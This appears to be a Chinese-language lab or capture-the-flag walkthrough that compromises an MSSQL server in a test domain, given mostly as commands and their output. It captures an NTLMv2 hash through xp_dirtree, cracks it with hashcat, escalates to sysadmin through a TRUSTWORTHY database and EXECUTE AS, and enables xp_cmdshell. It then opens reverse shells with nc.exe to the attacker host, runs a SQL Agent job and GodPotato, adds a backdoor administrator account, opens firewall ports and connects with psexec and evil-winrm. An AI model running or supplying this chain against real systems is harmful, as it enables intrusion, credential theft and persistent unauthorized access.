本文最后更新于10 天前,其中的信息可能已经过时,如有错误请发送邮件到big_fw@foxmail.com
mssql 连接
nxc mssql 192.168.184.129 -u db-user -p whoami
MSSQL 192.168.184.129 1433 DB-SERVER [*] Windows Server 2022 Build 20348 (name:DB-SERVER) (domain:faker.com)
MSSQL 192.168.184.129 1433 DB-SERVER [+] faker.com\db-user:whoami
impacket-mssqlclient db-user:whoami@192.168.184.129 -windows-auth -debug尝试中继捕获mssql 的服务账号 NTLMv2 哈希
EXEC xp_dirtree '\\192.168.184.128\share', 1, 1;impacket-smbserver . share -smb2support -username a -password a尝试破解hash
hashcat -m 5600 hash /usr/share/wordlists/rockyou.txt尝试 Pass-the-Hash “ntlm hash”
nxc mssql 192.168.184.129 -u DB-SERVER$ -H c1f94a1c6c223ecfc437a9161eb94155 --local-auth
MSSQL 192.168.184.129 1433 DB-SERVER [*] Windows Server 2022 Build 20348 (name:DB-SERVER) (domain:faker.com)
MSSQL 192.168.184.129 1433 DB-SERVER [-] DB-SERVER\DB-SERVER$:c1f94a1c6c223ecfc437a9161eb94155 (用户 'DB-SERVER$' 登录失败。 Please try again with or without '--local-auth') 尝试查看数据库名,版本,用户权限。xp_cmdshell (权限不足(无法启用 xp_cmdshell))
SELECT @@VERSION;
SELECT @@SERVERNAME;
SQL (faker\db-user guest@master)> select * from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell';
select name from sys.databases;
select * from sys.server_principals where name = 'faker\db-user';
select name from master.dbo.sysobjects where xtype='U';
USE msdb;
-- 查看 SQL Server 代理作业(可能包含定时执行的脚本、账号密码)
SELECT
job_id,
name AS 作业名,
description AS 作业描述,
date_created AS 创建时间
FROM
dbo.sysjobs;SQL (faker\db-user guest@master)> select * from sys.server_principals where name = 'faker\db-user';
name principal_id sid type type_desc is_disabled create_date modify_date default_database_name default_language_name credential_id owning_principal_id is_fixed_role tenant_id
------------- ------------ ----------------------------------------------------------- ---- ------------- ----------- ----------- ----------- --------------------- --------------------- ------------- ------------------- ------------- ------------------------------------
faker\db-user 266 b'010500000000000515000000e7ff8bd9a8aa376c0b1e456550040000' b'U' WINDOWS_LOGIN 0 2025-11-03 11:24:21 2025-12-05 11:18:06 master 简体中文 NULL NULL 0 00000000-0000-0000-0000-000000000000 SQL (faker\db-user guest@master)> SELECT name FROM sys.databases;
name ------
master
tempdb
model
msdb
faker
SQL (faker\db-user faker\db-user@faker)> SELECT name AS 业务表名 FROM faker.dbo.sysobjects WHERE xtype='U';
业务表名 -----
Notes
SQL (faker\db-user faker\db-user@master)> SELECT * FROM faker.dbo.Notes;
NoteID NoteContent
------ -----------------------------
1 为庆祝T1进入决赛,此数据库已经开启TRUSTWORTHY trustworthyTRUSTWORTHY开启后,数据库内的高权限存储过程(如xp_cmdshell、xp_dirtree)可突破权限隔离,低权限用户可通过该数据库提权至sysadmin;
攻击者常利用msdb/tempdb/ 自定义数据库的TRUSTWORTHY=1进行提权。
- 目标数据库的 所有者(
dbo)必须是sysadmin角色成员;? - 目标数据库的
TRUSTWORTHY属性必须设置为ON; - 执行提权操作的用户需有创建存储过程 / 程序集的权限(如数据库
dbo权限)。
SQL (faker\db-user guest@master)> SELECT name as database_name ,SUSER_NAME(owner_sid) AS database_owner , is_trustworthy_on AS TRUSTWORTHY from sys.databases;
database_name database_owner TRUSTWORTHY
------------- -------------- -----------
master sa 0
tempdb sa 0
model sa 0
msdb sa 1
faker NULL 1查询 faker 数据库中所有数据库角色及其成员
use faker;
SQL (faker\db-user faker\db-user@faker)> SELECT DP1.name AS DatabaseRoleName, isnull(DP2.name, 'No members') AS DatabaseUserName FROM sys.database_role_members AS DRM RIGHT OUTER JOIN sys.database_principals AS DP1 ON DRM.role_principal_id = DP1.principal_id LEFT OUTER JOIN sys.database_principals AS DP2 ON DRM.member_principal_id = DP2.principal_id WHERE DP1.type = 'R' ORDER BY DP1.name;
DatabaseRoleName DatabaseUserName
----------------- ----------------
db_accessadmin No members
db_backupoperator No members
db_datareader No members
db_datawriter No members
db_ddladmin No members
db_denydatareader No members
db_denydatawriter No members
db_owner dbo
db_owner faker\db-user
db_securityadmin No members
public No members EXECUTE AS USER 语句的核⼼功能是切换当前的执⾏上下⽂ (Execution Context) ,它允许 ⼀个数据库⽤⼾暂时以另⼀个数据库⽤⼾的⾝份执⾏代码。 在faker 数据库中,由于 faker\db-user 拥有 db_owner ⻆⾊,则它拥有对 IMPERSONATE 权限。执⾏此语句后, 味着在执⾏ dbo ⽤⼾的 faker\db-user 的执⾏上下⽂⽴即切换为 REVERT; 语句或会话结束之前,该会话将暂时失去 限,并完全获得 dbo ⽤⼾的所有权限。 dbo 。这意 faker\db-user 的所有权 ⼀旦 faker\db-user 成功地在 dbo 的上下⽂中运⾏,它就可以利⽤ dbo (数据库最⾼权限 ⽤⼾)的⾝份来执⾏更⾼权限的操作,为 db-user 授予 sysadmin 权限。
EXECUTE AS USER = 'dbo';
SELECT system_user;
SQL (faker\db-user faker\db-user@faker)> EXECUTE AS USER = 'dbo';
SQL (FAKER\Administrator dbo@faker)> SELECT system_user;
-------------------
FAKER\Administrator
EXEC sp_addsrvrolemember 'faker\db-user','sysadmin';
SELECT IS_SRVROLEMEMBER('sysadmin');
SQL (FAKER\Administrator dbo@faker)> EXEC sp_addsrvrolemember 'faker\db-user','sysadmin';
SQL (FAKER\Administrator dbo@faker)> SELECT IS_SRVROLEMEMBER('sysadmin');
-
1 enable_xp_cmdshell
SQL (FAKER\Administrator dbo@faker)> exec xp_cmdshell "whoami";
ERROR(db-server): Line 1: SQL Server 阻止了对组件“xp_cmdshell”的 过程“sys.xp_cmdshell”的访问,因为此组件已作为此服务器安全配置的一部分而被关闭。系统管理员可以通过使用 sp_configure 启用“xp_cmdshell”。有关启用“xp_cmdshell”的详细信息,请搜索 SQL Server 联机丛书中的“xp_cmdshell”。
SQL (FAKER\Administrator dbo@faker)> enable_xp_cmdshell;
INFO(db-server): Line 196: 配置选项 'show advanced options' 已从 0 更改为 1。请运行 RECONFIGURE 语句进行安装。
INFO(db-server): Line 196: 配置选项 'xp_cmdshell' 已从 0 更改为 1。请运行 RECONFIGURE 语句进行安装。
SQL (FAKER\Administrator dbo@faker)> exec xp_cmdshell "whoami";
output
----------------------
nt service\mssqlserver
NULL 反弹shell
SQL (FAKER\Administrator dbo@faker)> exec xp_cmdshell "net use \\192.168.184.128\share\ /USER:a a";
SQL (FAKER\Administrator dbo@faker)> exec xp_cmdshell "\\192.168.184.128\share\nc.exe 192.168.184.128 8888 -e cmd";rlwrap nc -lvp 8888
chcp 65001mssql server agent 服务用户 shell
USE master; SELECT servicename, service_account, status, status_desc FROM sys.dm_server_services;
SQL (FAKER\Administrator dbo@faker)> USE master; SELECT servicename, service_account, status, status_desc FROM sys.dm_server_services;
ENVCHANGE(DATABASE): Old Value: faker, New Value: master
INFO(db-server): Line 1: 已将数据库上下文更改为 "master"。
servicename service_account status status_desc
--------------------------- ------------------------- ------ -----------
SQL Server (MSSQLSERVER) NT Service\MSSQLSERVER 4 Running
SQL Server 代理 (MSSQLSERVER) NT Service\SQLSERVERAGENT 4 Running USE msdb; EXEC msdb.dbo.sp_add_job @job_name = N'AgentNoPass', @enabled = 1, @delete_level = 3; EXEC msdb.dbo.sp_add_jobstep @job_name = N'AgentNoPass', @step_name = N'AgentNC', @subsystem = N'Cmdexec', @command = N'net use \\192.168.184.128\share /user:a a'; EXEC msdb.dbo.sp_add_jobserver @job_name = N'AgentNoPass', @server_name = N'(local)'; EXEC msdb.dbo.sp_start_job @job_name = N'AgentNoPass';
SQL (faker\db-user dbo@msdb)> USE msdb; EXEC msdb.dbo.sp_add_job @job_name = N'AgentNoPass', @enabled = 1, @delete_level = 3; EXEC msdb.dbo.sp_add_jobstep @job_name = N'AgentNoPass', @step_name = N'AgentNC', @subsystem = N'Cmdexec', @command = N'net use \\192.168.184.128\share /user:a a'; EXEC msdb.dbo.sp_add_jobserver @job_name = N'AgentNoPass', @server_name = N'(local)'; EXEC msdb.dbo.sp_start_job @job_name = N'AgentNoPass';
SQL (faker\db-user dbo@msdb)> USE msdb; EXEC msdb.dbo.sp_add_job @job_name = N'AgentNoPass', @enabled = 1, @delete_level = 3; EXEC msdb.dbo.sp_add_jobstep @job_name = N'AgentNoPass', @step_name = N'AgentNC', @subsystem = N'Cmdexec', @command = N'\\192.168.184.128\share\nc.exe 192.168.184.128 9999 -e cmd'; EXEC msdb.dbo.sp_add_jobserver @job_name = N'AgentNoPass', @server_name = N'(local)'; EXEC msdb.dbo.sp_start_job @job_name = N'AgentNoPass';\\192.168.184.128\share\GodPotato-NET4.exe -cmd "cmd /c type C:\users\administrator\desktop\root.txt"防火墙
netsh advfirewall firewall show rule name=all verbose
netsh advfirewall show currentprofile
netsh advfirewall firewall show rule name=smballow
139
netsh advfirewall firewall add rule name=”Allow rpc 139″ protocol=TCP dir=in localport=139 action=allow
添加用户
net user /add ad admin123
net localgroup /add administrators ad
smb 445 端口开启的情况下,可以使用 psexec
rlwrap impacket-psexec "FAKER/ad:admin123"@192.168.184.129
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Requesting shares on 192.168.184.129.....
[*] Found writable share ADMIN$
[*] Uploading file HQDqSOVm.exe
[*] Opening SVCManager on 192.168.184.129.....
[*] Creating service xwuH on 192.168.184.129.....
[*] Starting service xwuH.....
[!] Press help for extra shell commands
[-] Decoding error detected, consider running chcp.com at the target,
map the result with https://docs.python.org/3/library/codecs.html#standard-encodings
and then execute smbexec.py again with -codec and the corresponding codec
Microsoft Windows [�汾 10.0.20348.4297]winrm 5985 开启的情况下,可以使用 winrm
C:\Windows\system32>winrm enumerate winrm/config/listener
Listener Address = *
Transport = HTTP
Port = 5985
Hostname Enabled = true
URLPrefix = wsman CertificateThumbprint
ListeningOn = 127.0.0.1, 192.168.184.129, ::1, fe80::99ac:16b6:e8d6:4d7d%14evil-winrm -i 192.168.184.129 -u ad -p admin123
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\ad\Documents> C:\Users\ad>netsh advfirewall show currentprofile
域配置文件 设置:
----------------------------------------------------------------------
状态 启用
防火墙策略 BlockInbound,AllowOutbound
LocalFirewallRules N/A (仅 GPO 存储)
LocalConSecRules N/A (仅 GPO 存储)
InboundUserNotification 禁用
RemoteManagement 未配置
UnicastResponseToMulticast 启用
日志:
LogAllowedConnections 禁用
LogDroppedConnections 禁用
FileName %systemroot%\system32\LogFiles\Firewall\pfirewall.log
MaxFileSize 4096确定。
C:\Users\ad>netsh advfirewall firewall show rule name=all verbose
规则名称: Allow rpc 139
----------------------------------------------------------------------
已启用: 是
方向: 入
配置文件: 域,专用,公用
分组:
本地 IP: 任何
远程 IP: 任何
协议: TCP
本地端口: 139
远程端口: 任何
边缘遍历: 否
接口类型: 任何
安全: NotRequired
规则源: 本地设置
操作: 允许
规则名称: @{Microsoft.AccountsControl_10.0.20348.1_neutral__cw5n1h2txyewy?ms-resource://Microsoft.AccountsControl/Resources/DisplayName}
----------------------------------------------------------------------
描述: @{Microsoft.AccountsControl_10.0.20348.1_neutral__cw5n1h2txyewy?ms-resource://Microsoft.AccountsControl/Resources/DisplayName}
已启用: 是
方向: 出
配置文件: 域,专用,公用
分组: 电子邮件和帐户
本地 IP: 任何
远程 IP: 任何
协议: 任何
边缘遍历: 否
接口类型: 任何
安全: NotRequired
规则源: 本地设置
操作: 允许
规则名称: @{Microsoft.LockApp_10.0.20348.1_neutral__cw5n1h2txyewy?ms-resource://Microsoft.LockApp/resources/AppDisplayName}
----------------------------------------------------------------------
描述: @{Microsoft.LockApp_10.0.20348.1_neutral__cw5n1h2txyewy?ms-resource://Microsoft.LockApp/resources/AppDisplayName}
已启用: 是
方向: 出
配置文件: 域,专用,公用
分组: Windows 默认锁屏界面
本地 IP: 任何
远程 IP: 任何
协议: 任何
边缘遍历: 否
接口类型: 任何
安全: NotRequired
规则源: 本地设置
操作: 允许
规则名称: @{Microsoft.Win32WebViewHost_10.0.20348.1_neutral_neutral_cw5n1h2txyewy?ms-resource://Windows.Win32WebViewHost/resources/DisplayName}
----------------------------------------------------------------------
描述: @{Microsoft.Win32WebViewHost_10.0.20348.1_neutral_neutral_cw5n1h2txyewy?ms-resource://Windows.Win32WebViewHost/resources/Description}
已启用: 是
方向: 入
配置文件: 域,专用,公用
分组: 桌面应用 Web 查看器
本地 IP: 任何
远程 IP: 任何
协议: 任何
边缘遍历: 是
接口类型: 任何
安全: NotRequired
规则源: 本地设置
操作: 允许
规则名称: @{Microsoft.Win32WebViewHost_10.0.20348.1_neutral_neutral_cw5n1h2txyewy?ms-resource://Windows.Win32WebViewHost/resources/DisplayName}
----------------------------------------------------------------------
描述: @{Microsoft.Win32WebViewHost_10.0.20348.1_neutral_neutral_cw5n1h2txyewy?ms-resource://Windows.Win32WebViewHost/resources/Description}
已启用: 是
方向: 出
配置文件: 域,专用,公用
分组: 桌面应用 Web 查看器
本地 IP: 任何
远程 IP: 任何
协议: 任何
边缘遍历: 否
接口类型: 任何
安全: NotRequired
规则源: 本地设置
操作: 允许
规则名称: @{Microsoft.Windows.Apprep.ChxApp_1000.20348.1.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Apprep.ChxApp/resources/DisplayName}
----------------------------------------------------------------------
描述: @{Microsoft.Windows.Apprep.ChxApp_1000.20348.1.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Apprep.ChxApp/resources/DisplayName}
已启用: 是
方向: 出
配置文件: 域,专用,公用
分组: Windows Defender SmartScreen
本地 IP: 任何
远程 IP: 任何
协议: 任何
边缘遍历: 否
接口类型: 任何
安全: NotRequired
规则源: 本地设置
操作: 允许
规则名称: @{Microsoft.Windows.NarratorQuickStart_10.0.20348.1_neutral_neutral_8wekyb3d8bbwe?ms-resource://Microsoft.Windows.NarratorQuickStart/Resources/AppDisplayName}
----------------------------------------------------------------------
描述: @{Microsoft.Windows.NarratorQuickStart_10.0.20348.1_neutral_neutral_8wekyb3d8bbwe?ms-resource://Microsoft.Windows.NarratorQuickStart/Resources/AppDescription}
已启用: 是
方向: 出
配置文件: 域,专用,公用
分组: 讲述人
本地 IP: 任何
远程 IP: 任何
协议: 任何
边缘遍历: 否
接口类型: 任何
安全: NotRequired
规则源: 本地设置
操作: 允许
规则名称: @{Microsoft.Windows.PeopleExperienceHost_10.0.20348.1_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.PeopleExperienceHost/resources/PkgDisplayName}
----------------------------------------------------------------------
描述: @{Microsoft.Windows.PeopleExperienceHost_10.0.20348.1_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.PeopleExperienceHost/resources/PkgDisplayName}
已启用: 是
方向: 出
配置文件: 域,专用,公用
分组: Windows Shell Experience
本地 IP: 任何
远程 IP: 任何
协议: 任何
边缘遍历: 否
接口类型: 任何
安全: NotRequired
规则源: 本地设置
操作: 允许
规则名称: @{Microsoft.Windows.SecHealthUI_10.0.20348.2849_neutral__cw5n1h2txyewy?ms-resource://Microsoft.Windows.SecHealthUI/resources/PackageDisplayName}
----------------------------------------------------------------------
描述: @{Microsoft.Windows.SecHealthUI_10.0.20348.2849_neutral__cw5n1h2txyewy?ms-resource://Microsoft.Windows.SecHealthUI/resources/ProductDescription}
已启用: 是
方向: 入
配置文件: 域,专用
分组: Windows 安全中心
本地 IP: 任何
远程 IP: 任何
协议: 任何
边缘遍历: 否
接口类型: 任何
安全: NotRequired
规则源: 本地设置
操作: 允许
规则名称: @{Microsoft.Windows.SecHealthUI_10.0.20348.2849_neutral__cw5n1h2txyewy?ms-resource://Microsoft.Windows.SecHealthUI/resources/PackageDisplayName}
----------------------------------------------------------------------
描述: @{Microsoft.Windows.SecHealthUI_10.0.20348.2849_neutral__cw5n1h2txyewy?ms-resource://Microsoft.Windows.SecHealthUI/resources/ProductDescription}
已启用: 是
方向: 出
配置文件: 域,专用,公用
分组: Windows 安全中心
本地 IP: 任何
远程 IP: 任何
协议: 任何
边缘遍历: 否
接口类型: 任何
安全: NotRequired
规则源: 本地设置
操作: 允许
规则名称: @{Microsoft.Windows.Search_1.15.0.20348_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Search/resources/PackageDisplayName}
----------------------------------------------------------------------
描述: @{Microsoft.Windows.Search_1.15.0.20348_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Search/resources/ProductDescription}
已启用: 是
方向: 入
配置文件: 域,专用
分组: Windows Search
本地 IP: 任何
远程 IP: 任何
协议: 任何
边缘遍历: 否
接口类型: 任何
安全: NotRequired
规则源: 本地设置
操作: 允许
规则名称: @{Microsoft.Windows.Search_1.15.0.20348_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Search/resources/PackageDisplayName}
----------------------------------------------------------------------
描述: @{Microsoft.Windows.Search_1.15.0.20348_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Search/resources/ProductDescription}
已启用: 是
方向: 出
配置文件: 域,专用,公用
分组: Windows Search
本地 IP: 任何
远程 IP: 任何
协议: 任何
边缘遍历: 否
接口类型: 任何
安全: NotRequired
规则源: 本地设置
操作: 允许
规则名称: @{Microsoft.Windows.ShellExperienceHost_10.0.20348.1_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.ShellExperienceHost/resources/PkgDisplayName}
----------------------------------------------------------------------
描述: @{Microsoft.Windows.ShellExperienceHost_10.0.20348.1_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.ShellExperienceHost/resources/PkgDisplayName}
已启用: 是
方向: 出
配置文件: 域,专用,公用
分组: Windows Shell Experience
本地 IP: 任何
远程 IP: 任何
协议: 任何
边缘遍历: 否
接口类型: 任何
安全: NotRequired
规则源: 本地设置
操作: 允许
规则名称: @{Microsoft.Windows.StartMenuExperienceHost_10.0.20348.1_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.StartMenuExperienceHost/StartMenuExperienceHost/PkgDisplayName}
----------------------------------------------------------------------
描述: @{Microsoft.Windows.StartMenuExperienceHost_10.0.20348.1_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.StartMenuExperienceHost/StartMenuExperienceHost/PkgDisplayName}
已启用: 是
方向: 入
配置文件: 域,专用
分组: 开始
本地 IP: 任何
远程 IP: 任何
协议: 任何
边缘遍历: 否
接口类型: 任何
安全: NotRequired
规则源: 本地设置
操作: 允许
规则名称: @{Microsoft.Windows.StartMenuExperienceHost_10.0.20348.1_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.StartMenuExperienceHost/StartMenuExperienceHost/PkgDisplayName}
----------------------------------------------------------------------
描述: @{Microsoft.Windows.StartMenuExperienceHost_10.0.20348.1_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.StartMenuExperienceHost/StartMenuExperienceHost/PkgDisplayName}
已启用: 是
方向: 出
配置文件: 域,专用,公用
分组: 开始
本地 IP: 任何
远程 IP: 任何
协议: 任何
边缘遍历: 否
接口类型: 任何
安全: NotRequired
规则源: 本地设置
操作: 允许
规则名称: Windows Feature Experience Pack
----------------------------------------------------------------------
描述: Windows Feature Experience Pack
已启用: 是
方向: 出
配置文件: 域,专用,公用
分组: Windows Feature Experience Pack
本地 IP: 任何
远程 IP: 任何
协议: 任何
边缘遍历: 否
接口类型: 任何
安全: NotRequired
规则源: 本地设置
操作: 允许
规则名称: @{Microsoft.Windows.OOBENetworkCaptivePortal_10.0.19580.1000_neutral__cw5n1h2txyewy?ms-resource://Microsoft.Windows.OOBENetworkCaptivePortal/Resources/AppDisplayName}
----------------------------------------------------------------------
描述: @{Microsoft.Windows.OOBENetworkCaptivePortal_10.0.19580.1000_neutral__cw5n1h2txyewy?ms-resource://Microsoft.Windows.OOBENetworkCaptivePortal/Resources/AppDisplayName}
已启用: 是
方向: 出
配置文件: 域,专用,公用
分组: 强制网络门户流
本地 IP: 任何
远程 IP: 任何
协议: 任何
边缘遍历: 否
接口类型: 任何
安全: NotRequired
规则源: 本地设置
操作: 允许
规则名称: @{Microsoft.AAD.BrokerPlugin_1000.19580.1000.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.AAD.BrokerPlugin/resources/PackageDisplayName}
----------------------------------------------------------------------
描述: @{Microsoft.AAD.BrokerPlugin_1000.19580.1000.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.AAD.BrokerPlugin/resources/PackageDisplayName}
已启用: 是
方向: 入
配置文件: 域,专用
分组: 工作或学校帐户
本地 IP: 任何
远程 IP: 任何
协议: 任何
边缘遍历: 否
接口类型: 任何
安全: NotRequired
规则源: 本地设置
操作: 允许
规则名称: @{Microsoft.AAD.BrokerPlugin_1000.19580.1000.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.AAD.BrokerPlugin/resources/PackageDisplayName}
----------------------------------------------------------------------
描述: @{Microsoft.AAD.BrokerPlugin_1000.19580.1000.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.AAD.BrokerPlugin/resources/PackageDisplayName}
已启用: 是
方向: 出
配置文件: 域,专用,公用
分组: 工作或学校帐户
本地 IP: 任何
远程 IP: 任何
协议: 任何
边缘遍历: 否
接口类型: 任何
安全: NotRequired
规则源: 本地设置
操作: 允许
规则名称: @{Microsoft.Windows.CloudExperienceHost_10.0.20348.1_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.CloudExperienceHost/resources/appDescription}
----------------------------------------------------------------------
描述: @{Microsoft.Windows.CloudExperienceHost_10.0.20348.1_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.CloudExperienceHost/resources/appDescription}
已启用: 是
方向: 入
配置文件: 域,专用
分组: 你的帐户
本地 IP: 任何
远程 IP: 任何
协议: 任何
边缘遍历: 否
接口类型: 任何
安全: NotRequired
规则源: 本地设置
操作: 允许
规则名称: @{Microsoft.Windows.CloudExperienceHost_10.0.20348.1_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.CloudExperienceHost/resources/appDescription}
----------------------------------------------------------------------
描述: @{Microsoft.Windows.CloudExperienceHost_10.0.20348.1_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.CloudExperienceHost/resources/appDescription}
已启用: 是
方向: 出
配置文件: 域,专用,公用
分组: 你的帐户
本地 IP: 任何
远程 IP: 任何
协议: 任何
边缘遍历: 否
接口类型: 任何
安全: NotRequired
规则源: 本地设置
操作: 允许
规则名称: Allow TCP 5985 for WinRM
----------------------------------------------------------------------
已启用: 是
方向: 入
配置文件: 域,专用,公用
分组:
本地 IP: 任何
远程 IP: 任何
协议: TCP
本地端口: 5985
远程端口: 任何
边缘遍历: 否
接口类型: 任何
安全: NotRequired
规则源: 本地设置
操作: 允许
规则名称: Allow External TCP 1433 for mssql
----------------------------------------------------------------------
已启用: 是
方向: 入
配置文件: 域,专用,公用
分组:
本地 IP: 任何
远程 IP: 任何
协议: TCP
本地端口: 1433
远程端口: 任何
边缘遍历: 否
接口类型: 任何
安全: NotRequired
规则源: 本地设置
操作: 允许
确定。
